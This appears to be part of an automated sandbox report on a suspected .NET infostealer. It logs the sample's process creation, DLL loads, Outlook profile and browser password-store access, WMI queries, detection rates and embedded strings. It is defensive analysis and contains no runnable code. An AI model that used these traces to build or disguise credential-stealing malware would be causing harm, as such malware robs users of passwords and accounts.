              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: OgBoRN.exe, 00000003.00000002.2401382417.000000000814E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000008136000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: gq8sce-clean.com.com.exeReversingLabs: Detection: 44%
              Source: gq8sce-clean.com.com.exeVirustotal: Detection: 27%
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $B2A5B5CE-3461-444A-91D4-ADD26D070638
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $B2A5B5CE-3461-444A-91D4-ADD26D0706382
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile read: C:\Users\user\Desktop\gq8sce-clean.com.com.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\gq8sce-clean.com.com.exe "C:\Users\user\Desktop\gq8sce-clean.com.com.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: gq8sce-clean.com.com.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: gq8sce-clean.com.com.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: gq8sce-clean.com.com.exeStatic file information: File size 15542784 > 1048576
              Source: gq8sce-clean.com.com.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xed0e00
              Source: gq8sce-clean.com.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
